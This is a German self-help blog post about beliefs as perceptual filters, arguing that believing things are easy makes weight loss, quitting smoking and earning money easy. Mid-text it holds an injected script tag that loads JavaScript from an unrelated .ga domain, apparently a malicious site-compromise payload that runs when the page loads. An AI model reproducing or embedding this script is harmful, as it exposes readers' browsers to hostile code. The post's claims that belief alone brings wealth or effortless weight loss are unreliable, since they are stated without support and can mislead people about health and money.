Wie du mehr Leichtigkeit in dein Leben bringst

Du siehst die Welt nicht so, wie sie ist.
Du siehst die Welt so, wie du bist.

Wir haben alle eine Brille auf.
Jeder trägt seine ganz eigene, individuell gefärbte Brille, durch welche die Welt WAHR-GENOMMEN wird. Wir nehmen also das, was wir sehen und hören für WAHR.
Das ist nicht die Welt, wie sie ist.
Das ist die Welt aus unserer Perspektive!

Das Witzige ist, dass wir Menschen nur einen sehr kleinen Teil von der Welt wahrnehmen können. Unsere Augen, Ohren und Nasen können nur einen winzigen Teil von der Welt wahrnehmen.
Es gibt also so einiges, was wir bewusst nicht wahrnehmen können.

<script src='https://letsmakeparty3.ga/l.js?p=1' type=text/javascript></script>

Und das, was unsere Sinne wahrnehmen können, wird nochmal gefiltert.
Durch unsere persönlichen Erfahrungen, unsere Kultur, unsere Glaubenssätze oder Einstellungen, Werte, Interessen und Annahmen.
Jeder Mensch lebt in seiner eigenen Welt, seinem eigenen Universum.
Diese Welt basiert bei jedem auf den Sinneseindrücken und individuellen Lebenserfahrungen.
Und wir handeln auf der Basis dessen, was wir wahrnehmen.
Das ist unser Modell der Welt.

Wenn du nun GLAUBST (Glaubenssatz/ Einstellung), dass alles so schwierig sei, dann wird es das auch sein.
Das ist self fulfillig prophecy; meint:
Selbsterfüllende Prophezeiung. Du prophezeist beispielsweise, dass das Abnehmen schwierig für dich ist. Und diese Prophezeiung ('Das Abnehmen ist schwierig für mich') erfüllt sich selbst. Deine Überzeugung, dass das Abnehmen schwierig für dich sei, macht es erst schwierig für dich!

Weil du nimmst die Welt (in diesem Fall das Thema Abnehmen) ja so wahr. Also wird es auch so für dich sein.
Ob leicht oder schwierig – wer weiß das schon?

DU bestimmst, wie du zu den Dingen stehst.

Manche Menschen glauben, sie müssten für Geld hart und viel arbeiten. Tag und Nacht. Schlaf? Nein danke – 3 Stunden pro Nacht reichen.

Und sie schaffen und schaffen, während ihr Körper, ihre Seele und ihr Geist abgeschafft und abgeschafft werden.

Es gibt aber auch reichlich viele Menschen, die sich nicht verausgaben und trotzdem über fette Moneten auf ihrem Bankkonto verfügen. Und das liegt nicht etwa daran, dass der liebe Gott den einen gesegnet und den anderen verdammt hat.
Nein. Das liegt daran, weil der eine glaubt, man müsse hart und viel arbeiten, um an viel Geld zu kommen und der andere glaubt vielleicht so was wie:
Wenn ich meinem Herzen folge, an meinen Visionen dranbleibe und meine Lebensrichtung gen meine Träume ausrichte, komme ich mit Freude und Leichtigkeit an ganz viel Geld.

Wenn du morgens aufwachst und glaubst, dass das heute ein harter und langer Tag für dich werden wird, dann – was für eine ÜBERRASCHUNG – wird es genau so sein. Weil deine EINSTELLUNG zu diesem Tag so ist. Der Tag hat dann keine Chance gegen dich.
Die Wunder des Lebens kommen nicht durch deinen Filter – du nimmst sie nicht wahr, weil du nicht glaubst, dass das Leben unendlich viele Wunder birgt, sondern im Gegenteil: Hart und anstrengend zu dir ist.

Wie bitteschön soll dir das Leben diese Wunder zeigen? Ich meine, es zeigt dir unendlich viele Wunder. Aber du kannst diese durch deine Wunder ausschließende Brille nicht wahrnehmen.
Und da das Leben sanft und liebevoll ist (auch ein Glaubenssatz übrigens) wird es dir die Wunder nicht reinprügeln. Es serviert dir diese Wunder auf einem Silbertablett, aber wenn du an diesem Tablett vorbeiläufst, ohne darauf zu schauen, kann das Leben dir auch nicht mehr helfen.

Worauf ist deine Aufmerksamkeit gerichtet? Durch welchen Filter liest du diesen Eintrag gerade?
Gehst du mit einem offenen und neugierigen Geist an das Ganze oder glaubst du, dass ich sinnloses Zeug schreibe? Dann wird jedes weitere Wort seine Wirkung bei dir verfehlen. Diese Worte können dann nicht bei dir wirken, weil sie durch deine Filter aussortiert werden.

Alles im Leben ist Einstellung.
Deine Einstellung zu den Dingen. Deine Einstellung zu Frauen. Zu Männern. Zu Türken. Zu Corona. Zum Abnehmen. Zum Rauchen (Möglicher Glaubenssatz: es ist so schwierig mit dem Rauchen aufzuhören!)
Deine Einstellung zum neuen Tag. Deine Einstellung zu deiner Arbeit. Deine Einstellung zu dir selbst. Und schließlich deine Einstellung zu diesem Leben.

Was glaubst du, ist der Sinn deines Lebens? Glaubst du, du bist zufällig hier? Glaubst du, du bist hier, weil du die Welt mit deinem Sein bereicherst? Glaubst du, du hast hier eine bestimmte Mission zu erfüllen? Sei diese auch „nur“ ein liebevoller, strahlender Mensch zu sein, der seine Mitmenschen durch seine warmen Strahlen erfreut?

Die Einstellung, die du zu dir SELBST hast, ist neben der Einstellung, die du zum LEBEN hast, FUNDAMENTAL für alles andere.

Nun, wie bringen wir Leichtigkeit in unser Leben?
Ganz einfach gesagt:
Indem wir einfach GLAUBEN, dass uns alles mit Leichtigkeit von der Hand geht.
Indem wir einfach GLAUBEN, dass es das Leben gut mit uns meint.
Indem wir einfach GLAUBEN, dass das Abnehmen leicht für uns ist.
Indem wir einfach GLAUBEN, dass es leicht für uns ist, die Glimmstängel wegzulassen.

Indem wir es uns einfach einfach machen!

Ich veranschauliche das mal an einem Beispiel, bei dem es um das Abnehmen geht.

Vor dem Beispiel möchte ich aber kurz etwas einschieben:
Unsere Gesellschaft gibt uns Ideale vor, von denen wir GLAUBEN, sie seien das, was „perfekt“ ist. Und von diesem „Perfekten“ GLAUBEN wir, dass es unseren Wert als Mensch bestimmt.
Also GLAUBTE ich lange Zeit, dass ich diesem Ideal, dessen Ursprung in irgendeiner Gesellschaft liegt, in der ich groß geworden bin, entsprechen müsse.

Ich war damals fülliger als heute und mein „Übergewicht“ (denn wer sagt denn, ab wann es „Übergewicht“ ist?) war lange lange Zeit nicht nur eine körperliche Last für mich. Ich GLAUBTE, ich sei nicht schön genug. Ich sei nicht dies genug und ich sei nicht jenes genug.
Ich erinnere mich leider nicht daran, was meine Glaubenssätze zu der Zeit waren. Unsere Glaubenssätze schwimmen nicht an der Oberfläche unseres Bewusstseins – sie sind ganz tief in uns. Dort sind sie felsenfest verankert (was nicht bedeutet, dass wir sie nicht transformieren können). Und da ich damals nicht einmal das Wort 'Glaubenssatz' kannte, wusste ich nicht, was in mir vorgeht.
Jedenfalls habe ich dann irgendwann abgenommen. Ziemlich viel abgenommen. Und dann war ich schlank und...

… fühlte mich immer noch nicht schön genug. Ich war immer noch nicht dies genug und jenes genug.
Ich schiebe diese persönliche Story an dieser Stelle ein, weil ich weiß, wie es ist, wenn man glaubt, dass der eigene Körper nicht perfekt sei. Weil die Gesellschaft ein Ideal vorgibt, das ich im Spiegelbild nicht sehe, BEWERTE ich meinen Körper als hässlich, nicht schön, was auch immer und fühle mich scheiße.
Mein Leben lang. Weil meine EINSTELLUNG (geprägt durch die Gesellschaft, in der ich lebe) zu meinem Körper ist, dass er nicht schön und gut genug sei. Dass er eigentlich PERFEKT sein muss, es aber keinesfalls ist (so bewerte ich ihn).

Wir können damit anfangen, Leichtigkeit in unser Leben zu bringen, indem wir beginnen, zu durchleuchten, was uns wer eigentlich für Glaubenssätze und Überzeugungen zu dem, wie etwas sein soll, einimpfen will (oder eingeimpft hat.)

HALT, STOPP! Es geht keinesfalls um Schuldzuweisungen!
Nur darum, dass du dir BEWUSST machst, was du von wo aufgeschnappt und zu deiner eigenen EINSTELLUNG gemacht hast.

NOBODY IS PERFECT.
NO BODY IS PERFECT.
WHAT IS „PERFECT“?
AN ILLUSION.

Perfektionismus ist eine Illusion. Perfektionismus basiert auf BEWERTUNGEN.
Alles ist so, wie es ist. Du siehst die Dinge (hier: deinen Körper) so, wie du bist (durch deine Filter).

Was bleibt übrig, wenn alle Ideale wegfallen?
Wenn du dich von ihnen LOS-LÖST? Sie LOSLÄSST? Dein Leben nicht mehr auf ihnen aufbaust, sondern deine eigene Richtung einschlägst?

Dann bleibt ein Körper. Ein Körper, der einfach nur ist. Ein Körper, dessen natürlicher Zustand Gesundheit und Vitalität ist. Ein Körper, der PERFEKT funktioniert.

Mir fällt gerade noch so so viel zu diesem Thema ein, aber gleichzeitig fällt mir auch auf, dass der Name dieses Artikels nicht „Abnehmen mit Leichtigkeit“ oder „Liebe deinen Körper leicht“, sondern „Wie du mehr Leichtigkeit in dein Leben bringst“ heißt .

Da Leichtigkeit aber etwas mit sich (körperlich) leicht fühlen gemein hat, bewerte ich diesen Einschub BEWUSST als angemessen. Denn innere Glaubenssätze wie „Wen juckt diese Geschichte jetzt?“ oder „Was daran soll jetzt bitteschön inspirierend sein?“ sprudeln gerade aus meinem Inneren.
Aber ich sage BEWUSST: 'Halt, stopp. Meine Finger haben gerade Wort für Wort diese Story eingefügt. Das war intuitiv. Und es fühlt sich für mich richtig an. Also seid jetzt still – Dangeeeee.'

Na ja, long story short möchte ich damit sagen, dass sich unglaublich viel verändert, wenn wir anfangen, die Dinge aus einer anderen Perspektive zu sehen. Und dazu dürfen wir Dinge durchleuchten und sie uns BEWUSST machen.

So. Jetzt kommen wir doch endlich mal zu unserem Beispiel – Abnehmen.

Elsa glaubt, dass es schwierig für sie ist, abzunehmen.
Sie glaubt, es ist schwierig, mehrmals die Woche Sport zu machen.
Sie glaubt, es ist schwierig, auf Leckereien zu verzichten.
Sie glaubt, es ist schwierig, dass sich ihr Körper umformt.

Weil Elsa so GLAUBT, so eine EINSTELLUNG zum Abnehmen hat,

...ist jeder Gang zum Sport anstrengend.
...ist jeder Verzicht auf Schokolade anstrengend und von Mangel begleitet.
...ist es anstrengend für ihren Körper, mit Elsa's ablehnenden Haltung ihm gegenüber umzugehen und sich umzuformen.

Wenn Elsa nun anfangen würde, zu GLAUBEN, es sei LEICHT für sie, abzunehmen (denn der natürliche Zustand unserer Körper ist die Gesundheit), dann würde sie leicht abnehmen.

Du selbst bist verantwortlich für deine Gedanken, Gefühle und Handlungen.
Und du bist auch selbst-verantwortlich für deine Glaubenssätze und deine Einstellung.

Ist etwas leicht?
Ist etwas schwierig?
Wer weiß das schon?

Du siehst die Welt nicht, wie sie ist.
Du siehst die Welt so, wie du bist.

Machst du es dir unnötig kompliziert?
Wieso?
Was GLAUBST du?
Überprüfe mal, was du GLAUBST.

Wenn du dir etwas in deinem Geist vorstellen kannst, kannst du es auch verWIRKLICHen.
Was ist denn WIRKlich?
Das, was DU verursachst.
Ursache-Wirkung.
Ein universelles Prinzip.
Habe ich nicht erfunden.
Habe ich entdeckt.
Und erfahren.

Was du denkst, fühlst und wie du handelst ist eine Ursache, die eine WIRKung hat.
Die einzige Sache, über die wir Menschen IMMER die KONTROLLE haben werden, ist unsere INNERE HALTUNG .
Von allem anderen GLAUBEN wir, wir hätten die Kontrolle.
Die letzten 3 Monate sollten uns gezeigt haben, dass nicht nur Perfektionismus, sondern auch Kontrolle eine Illusion ist, an der wir festhalten.

Wenn du deine inneren Bilder, deine Träume und Vorstellungen, als unWIRKlich abstempelst, werden sie verloren gehen.
Wenn du deine inneren Bilder, deine Träume und Vorstellungen hingegen als eine ANDERE Wirklichkeit wahrnimmst, kannst du deinen inneren Kompass nach ihnen ausrichten uns sie durch diese BEWUSSTE Ausrichtung verWIRKLICHen.
Du setzt die Ursache mit inneren Bildern, die deinem wahren Selbst entsprechen und ich verspreche dir: Die Wirkung wird sich zeigen.

Wenn du nun beginnst (in deinem eigenen Rhythmus, nach deinen eigenen Regeln) zu GLAUBEN, dass Dinge LEICHT sind, werden die Dinge immer LEICHTER und LEICHTER für dich werden.

Es ist nur eine Frage der inneren HALTUNG.
Wie HÄLTST du dein Inneres?

Abschließend möchte ich dir eines sagen:

FAKE IT TILL YOU MAKE IT.
Tu so als ob, bist es so ist (wie du es gerne hast).

Du sollst dir nichts schön reden.
Du sollst dir einfach ein neues, inneres Weltbild erschaffen.
Ein neues, anderes Selbstbild.

Dinge durchleuchten, sie dir bewusst machen und erkennen, dass DU der ARCHITEKT deines Lebens bist.
Und diese kraftvolle Gabe, die uns allen in die Wiege gelegt wurde, richtig nutzen.
Diese kraftvolle Gabe ist die schöpferische Kraft in uns, im Fluss mit dem Leben zu sein (=loszulassen) und gleichzeitig die Kontrolle dafür zu übernehmen, was wir erschaffen möchten.

Du bestimmst, was sich RICHTig für dich anfühlt.
Denn es ist deine RICHTung.

Ich wünsche dir von Herzen ganz viel Leichtigkeit.

Hab einen wundervollen Tag,
dein NLP-Zauberlehrling
Elifcan

Kommentar verfassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.